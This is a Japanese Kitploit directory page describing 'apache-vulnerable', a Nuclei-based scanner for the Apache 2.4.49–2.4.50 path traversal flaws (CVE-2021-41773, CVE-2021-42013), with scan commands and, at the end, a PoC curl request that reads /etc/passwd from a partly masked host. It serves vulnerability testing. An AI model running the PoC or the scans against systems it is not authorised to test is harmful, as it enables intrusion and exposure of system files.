Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
apache-vulnerable — Apache HTTP Serverのパストラバーサル脆弱性(CVE-2021-41773、CVE-2021-42013)を検出します。これは、様々なトラバーサル手法を通じて/etc/passwdの露出をチェックすることによって行われます。 | Kitploit
ツール/GitHubGitHub/psibot/apache-vulnerable
脆弱性スキャナーウェブ脆弱性スキャナー脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト
GitHubpsibot/apache-vulnerable

apache-vulnerable

Apache HTTP Serverのパストラバーサル脆弱性(CVE-2021-41773、CVE-2021-42013)を検出します。これは、様々なトラバーサル手法を通じて/etc/passwdの露出をチェックすることによって行われます。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apacheバージョン「ゼロデイ」のスキャン

Apache Version 2.4.49 and 2.4.50

(CVE-2021-41773) and (CVE-2021-42013)

使用方法 :

Nucleiが必要です!

https://github.com/projectdiscovery/nuclei

ローカルのNucleiインストールを確認し、テンプレートを検証してください

nuclei -t apache-vulnerable-versions.yaml -vv

および

nuclei -t apache-path-traversal-rce-v2.yaml -vv

以下の出力が表示されるはずです

[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]

および

[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]

ターゲットをスキャンするには:

nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port

ファイル内のターゲットをスキャンするには:

nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt

Nucleiテンプレートについて

apache-vulnerable-versions.yaml - Apacheのバージョンを検出し、脆弱な場合はHIGHを出力します。

apache-vulnerable-versions.yaml

apache-path-traversal-rce-v2.yaml - エクスプロイトを実行し、脆弱なパスを表示します。脆弱な場合はCRITICALを出力します。

apache-path-traversal-rce-v2.yaml

PoC:

curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

POC

ツールをダウンロード